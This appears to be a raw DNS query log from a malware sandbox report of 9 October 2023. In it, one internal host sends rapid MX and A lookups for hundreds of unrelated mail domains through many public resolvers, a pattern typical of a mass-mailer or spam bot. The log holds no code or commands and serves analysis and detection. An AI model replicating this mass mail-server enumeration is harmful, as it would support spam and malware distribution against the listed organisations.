                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.954112053 CEST192.168.2.38.8.4.40xd069Standard query (0)huskyenergy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.954538107 CEST192.168.2.31.1.1.10xd069Standard query (0)buildness.ptMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.954863071 CEST192.168.2.31.0.0.10xd069Standard query (0)veeam.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.957197905 CEST192.168.2.38.8.4.40xd069Standard query (0)6clo.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.966268063 CEST192.168.2.38.8.4.40xdf69Standard query (0)gtdel.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.966270924 CEST192.168.2.31.1.1.10xef69Standard query (0)scicom.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.967019081 CEST192.168.2.3208.67.222.2220xef69Standard query (0)gybond.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.967021942 CEST192.168.2.3149.112.112.1120x186bStandard query (0)formag.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.967361927 CEST192.168.2.3208.67.222.2220x186bStandard query (0)gemil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.968106031 CEST192.168.2.38.8.4.40x186bStandard query (0)lyon.condesa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.968106031 CEST192.168.2.3208.67.220.2200x186bStandard query (0)bee-s.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.968429089 CEST192.168.2.3208.67.220.2200x186bStandard query (0)mailsadf.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.968807936 CEST192.168.2.39.9.9.90x186bStandard query (0)igexsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.981591940 CEST192.168.2.3208.67.222.2220x276bStandard query (0)sportwave.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.982326984 CEST192.168.2.31.0.0.10x276bStandard query (0)naui.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.982326984 CEST192.168.2.3208.67.222.2220x276bStandard query (0)icci.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.982707977 CEST192.168.2.3149.112.112.1120x276bStandard query (0)tcmri.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.984252930 CEST192.168.2.3208.67.222.2220x276bStandard query (0)hitmail.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.984360933 CEST192.168.2.3149.112.112.1120x276bStandard query (0)clubadriatic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.984663963 CEST192.168.2.38.8.8.80x276bStandard query (0)defran.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.985063076 CEST192.168.2.39.9.9.90x276bStandard query (0)web.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:44.985434055 CEST192.168.2.3208.67.222.2220x276bStandard query (0)burke.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.108649969 CEST192.168.2.3194.0.14.10xb46bStandard query (0)centrum-cz-10mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.109519958 CEST192.168.2.3192.12.94.300xb46bStandard query (0)gourmet7.spamgourmet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.110490084 CEST192.168.2.3194.0.14.10xb46bStandard query (0)centrum-cz-10mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.111258030 CEST192.168.2.3192.12.94.300xb46bStandard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.112117052 CEST192.168.2.3192.12.94.300xb46bStandard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.124739885 CEST192.168.2.3208.84.67.2080xd36bStandard query (0)mxa-003d6e01.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.125036001 CEST192.168.2.3104.47.38.80xd36bStandard query (0)pcl-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.126578093 CEST192.168.2.3194.0.14.10xd36bStandard query (0)mspool.cdt.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.127615929 CEST192.168.2.3104.47.38.80xd36bStandard query (0)cury-net.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.128748894 CEST192.168.2.3192.12.94.300xd36bStandard query (0)gourmet7.spamgourmet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.294049978 CEST192.168.2.38.8.8.80xc76dStandard query (0)nyrmusic.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.309954882 CEST192.168.2.31.1.1.10xdd31Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.342168093 CEST192.168.2.3149.112.112.1120xf66dStandard query (0)1982.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.342693090 CEST192.168.2.39.9.9.90xf66dStandard query (0)oswego.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.343060017 CEST192.168.2.3208.67.220.2200xf66dStandard query (0)1thecity.bizMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.356848001 CEST192.168.2.31.0.0.10x66eStandard query (0)hamnail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.358186960 CEST192.168.2.3208.67.220.2200x66eStandard query (0)logicify.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.359066010 CEST192.168.2.38.8.8.80x66eStandard query (0)williamsanderson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.387914896 CEST192.168.2.31.1.1.10xa149Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.388494968 CEST192.168.2.3208.67.222.2220x5d6fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.404280901 CEST192.168.2.3149.112.112.1120x6d6fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.404486895 CEST192.168.2.31.0.0.10x6d6fStandard query (0)4mail.topMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.419612885 CEST192.168.2.31.0.0.10x7d6fStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.419612885 CEST192.168.2.3208.67.220.2200x7d6fStandard query (0)hotmmai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.450659037 CEST192.168.2.38.8.8.80x9c6fStandard query (0)mouseclicker.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.451597929 CEST192.168.2.38.8.8.80x9c6fStandard query (0)romao.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.451600075 CEST192.168.2.3208.67.222.2220xac6fStandard query (0)eindia.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.466465950 CEST192.168.2.31.0.0.10xbb6fStandard query (0)ellusions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.466465950 CEST192.168.2.38.8.4.40xbb6fStandard query (0)tanya.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.466826916 CEST192.168.2.3208.67.222.2220xbb6fStandard query (0)moakt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.481602907 CEST192.168.2.38.8.8.80xcb6fStandard query (0)icoud.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.559883118 CEST192.168.2.31.1.1.10x2970Standard query (0)kelon.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.561211109 CEST192.168.2.3208.67.220.2200x2970Standard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.561487913 CEST192.168.2.39.9.9.90x2970Standard query (0)net-up.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.562489033 CEST192.168.2.3208.67.222.2220x2970Standard query (0)power-trac.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.562489033 CEST192.168.2.3149.112.112.1120x2970Standard query (0)whitemc.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.563231945 CEST192.168.2.38.8.4.40x2970Standard query (0)bt.pfMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.564013958 CEST192.168.2.3208.67.222.2220x2970Standard query (0)spatial.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.564013958 CEST192.168.2.31.0.0.10x2970Standard query (0)starpoint.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.564627886 CEST192.168.2.38.8.4.40x2970Standard query (0)uoit.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.576651096 CEST192.168.2.38.8.4.40x3870Standard query (0)bettzedek.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.591962099 CEST192.168.2.38.8.4.40x7171Standard query (0)virusadv.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.593199968 CEST192.168.2.39.9.9.90x7171Standard query (0)jees.czMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.749195099 CEST192.168.2.3156.154.132.2000x2c72Standard query (0)vdn.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.750303984 CEST192.168.2.313.107.236.2080x2c72Standard query (0)karan-carpets.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.752386093 CEST192.168.2.31.1.1.10x193Standard query (0)authns1.alticeusa.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.779126883 CEST192.168.2.31.1.1.10x1748Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.966264009 CEST192.168.2.31.1.1.10x2070Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.992024899 CEST192.168.2.397.74.98.670xa775Standard query (0)fastleader.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.992024899 CEST192.168.2.3167.206.12.120xa775Standard query (0)suddenlink.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:45.993022919 CEST192.168.2.31.1.1.10x45a1Standard query (0)421.ns1.above.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.102346897 CEST192.168.2.31.1.1.10xfcadStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.123425007 CEST192.168.2.31.1.1.10x6259Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.162303925 CEST192.168.2.3103.224.182.50xba77Standard query (0)cho.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.163424969 CEST192.168.2.31.1.1.10x1804Standard query (0)ns8-l2.nic.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.289158106 CEST192.168.2.31.1.1.10x6e84Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.328142881 CEST192.168.2.391.217.21.200x8578Standard query (0)irkut.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.329232931 CEST192.168.2.31.1.1.10x9415Standard query (0)ns1.servconfig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.493470907 CEST192.168.2.3216.194.168.1120x797aStandard query (0)np011.seMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.494359970 CEST192.168.2.3198.51.44.40x797aStandard query (0)dfoofmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.497646093 CEST192.168.2.3216.239.34.990x897aStandard query (0)gmaul.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.498481989 CEST192.168.2.366.234.112.700x897aStandard query (0)fedteldirect.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.499689102 CEST192.168.2.31.1.1.10x7cdStandard query (0)domains2.uniserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.502849102 CEST192.168.2.31.1.1.10x71baStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.712759972 CEST192.168.2.3216.113.192.60xbb7cStandard query (0)pacificcoast.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.713799000 CEST192.168.2.313.107.236.20xbb7cStandard query (0)ch2m.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.714637041 CEST192.168.2.31.226.85.40xbb7cStandard query (0)nscable.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.715698957 CEST192.168.2.31.1.1.10x324Standard query (0)ns1.epbinternet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.953942060 CEST192.168.2.31.1.1.10x7637Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.998285055 CEST192.168.2.374.205.143.20x9480Standard query (0)epbfi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:46.999388933 CEST192.168.2.31.1.1.10xc847Standard query (0)ns-1553.awsdns-02.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.163645029 CEST192.168.2.3205.251.198.170x9782Standard query (0)ghnt.nhs.ukMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.169892073 CEST192.168.2.397.74.107.280xa782Standard query (0)mrhc.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.170979977 CEST192.168.2.3108.162.193.2420xb782Standard query (0)cropking.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.171773911 CEST192.168.2.31.1.1.10x3c4eStandard query (0)jim.ns.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.218813896 CEST192.168.2.31.1.1.10xcec8Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.295321941 CEST192.168.2.31.1.1.10x6e84Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.325021982 CEST192.168.2.31.1.1.10xdd31Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.336733103 CEST192.168.2.3173.245.59.1250xba84Standard query (0)fbconcord.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.337841988 CEST192.168.2.31.1.1.10x6ec4Standard query (0)ns3.digitalwest.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.372164011 CEST192.168.2.31.1.1.10xdf4fStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.504142046 CEST192.168.2.372.29.160.2410xcd86Standard query (0)slochamber.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.505143881 CEST192.168.2.31.1.1.10x5b31Standard query (0)authns1.cv.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.742770910 CEST192.168.2.3167.206.12.120x3e89Standard query (0)cablevision.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.743026972 CEST192.168.2.3195.78.223.2420x3e89Standard query (0)mclink.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:47.744153976 CEST192.168.2.31.1.1.10xbd26Standard query (0)ns3.combell.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.273844957 CEST192.168.2.31.1.1.10x2161Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.282509089 CEST192.168.2.31.1.1.10xac63Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.324206114 CEST192.168.2.31.1.1.10x6e84Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.642335892 CEST192.168.2.31.1.1.10x46eeStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.747013092 CEST192.168.2.31.1.1.10xbd26Standard query (0)ns3.combell.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:48.888128042 CEST192.168.2.31.1.1.10xd48dStandard query (0)agulatex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.306615114 CEST192.168.2.31.1.1.10xa455Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.661349058 CEST192.168.2.383.217.73.1720x33a5Standard query (0)vmbuildingsolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.661875010 CEST192.168.2.39.9.9.90x33a5Standard query (0)fhbg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.662447929 CEST192.168.2.3208.67.220.2200x33a5Standard query (0)syntrans.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.662909985 CEST192.168.2.31.1.1.10x33a5Standard query (0)gftg.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.669110060 CEST192.168.2.3208.67.220.2200x42a5Standard query (0)cutemailbox.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.669559002 CEST192.168.2.31.1.1.10x42a5Standard query (0)rootfest.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.670680046 CEST192.168.2.31.1.1.10x42a5Standard query (0)adinet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.671197891 CEST192.168.2.3208.67.222.2220x42a5Standard query (0)srbattery.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.671758890 CEST192.168.2.39.9.9.90x42a5Standard query (0)optilink.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.672265053 CEST192.168.2.31.0.0.10x42a5Standard query (0)mariareinamarianistas.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.672909975 CEST192.168.2.3208.67.220.2200x42a5Standard query (0)minock.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.673477888 CEST192.168.2.31.1.1.10x42a5Standard query (0)husi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.674026966 CEST192.168.2.38.8.4.40x42a5Standard query (0)sninternet.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.674488068 CEST192.168.2.3208.67.220.2200x42a5Standard query (0)medianis.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.686536074 CEST192.168.2.3149.112.112.1120x52a5Standard query (0)klett.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.686906099 CEST192.168.2.38.8.4.40x52a5Standard query (0)samtack.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.687416077 CEST192.168.2.3208.67.220.2200x52a5Standard query (0)etna-alternance.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.688107967 CEST192.168.2.3208.67.222.2220x52a5Standard query (0)equalt.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.688483000 CEST192.168.2.39.9.9.90x52a5Standard query (0)ymaio.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.688939095 CEST192.168.2.3149.112.112.1120x52a5Standard query (0)lancemore.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.689337015 CEST192.168.2.31.1.1.10x52a5Standard query (0)digitalmind.rsMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.689659119 CEST192.168.2.38.8.4.40x52a5Standard query (0)univ-paris-diderot.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.690114021 CEST192.168.2.31.0.0.10x52a5Standard query (0)otegroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.712120056 CEST192.168.2.31.1.1.10x81a5Standard query (0)a3.vi2software.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.712733984 CEST192.168.2.38.8.8.80x81a5Standard query (0)visu.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.713244915 CEST192.168.2.38.8.4.40x81a5Standard query (0)whistlerlibrary.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.713865995 CEST192.168.2.31.0.0.10x81a5Standard query (0)personeltedarik.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.714442968 CEST192.168.2.39.9.9.90x81a5Standard query (0)mxa-00300601.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.715154886 CEST192.168.2.38.8.8.80x81a5Standard query (0)troygroup.com.2.0001.arsmtp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.715723038 CEST192.168.2.38.8.8.80x90a5Standard query (0)mx.yandex.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.716375113 CEST192.168.2.31.1.1.10x90a5Standard query (0)mx2.nifty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.717051029 CEST192.168.2.31.1.1.10x90a5Standard query (0)mailin100.dcpserver.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.731812000 CEST192.168.2.3208.67.222.2220xa0a5Standard query (0)mta-gw.infomaniak.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.732546091 CEST192.168.2.31.0.0.10x7a7Standard query (0)mxb-00033b02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.733223915 CEST192.168.2.3208.67.222.2220x7a7Standard query (0)mxa-0034a001.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.733778954 CEST192.168.2.3208.67.222.2220x7a7Standard query (0)nsp2.thold-it.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.734406948 CEST192.168.2.31.1.1.10x7a7Standard query (0)mail2.g1.pair.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.734973907 CEST192.168.2.38.8.8.80x7a7Standard query (0)cp-tel-net.mx.av-mx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.735517025 CEST192.168.2.3208.67.220.2200x7a7Standard query (0)mx.yandex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.736257076 CEST192.168.2.3208.67.220.2200x7a7Standard query (0)mailstream-west.mxrecord.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.750153065 CEST192.168.2.3208.67.222.2220x17a7Standard query (0)mx4.burnserver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.752213955 CEST192.168.2.38.8.4.40x17a7Standard query (0)rapinfosolutions-com.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.752708912 CEST192.168.2.31.1.1.10x17a7Standard query (0)cluster1a.eu.messagelabs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.753812075 CEST192.168.2.38.8.8.80x17a7Standard query (0)mx1.mijndomein.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.755429983 CEST192.168.2.39.9.9.90x17a7Standard query (0)aspmx3.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.755923986 CEST192.168.2.38.8.8.80x17a7Standard query (0)smtp.safesysmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.758119106 CEST192.168.2.31.0.0.10x17a7Standard query (0)mx02.xnote.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.758629084 CEST192.168.2.39.9.9.90x17a7Standard query (0)centrum-cz-10mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.759540081 CEST192.168.2.31.1.1.10x17a7Standard query (0)gourmet7.spamgourmet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.763382912 CEST192.168.2.38.8.8.80x27a7Standard query (0)centrum-cz-10mx1.eco-mx.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:49.763870001 CEST192.168.2.38.8.4.40x46a7Standard query (0)em4.mainnetmail.comA (IP address)IN (0x0001)false
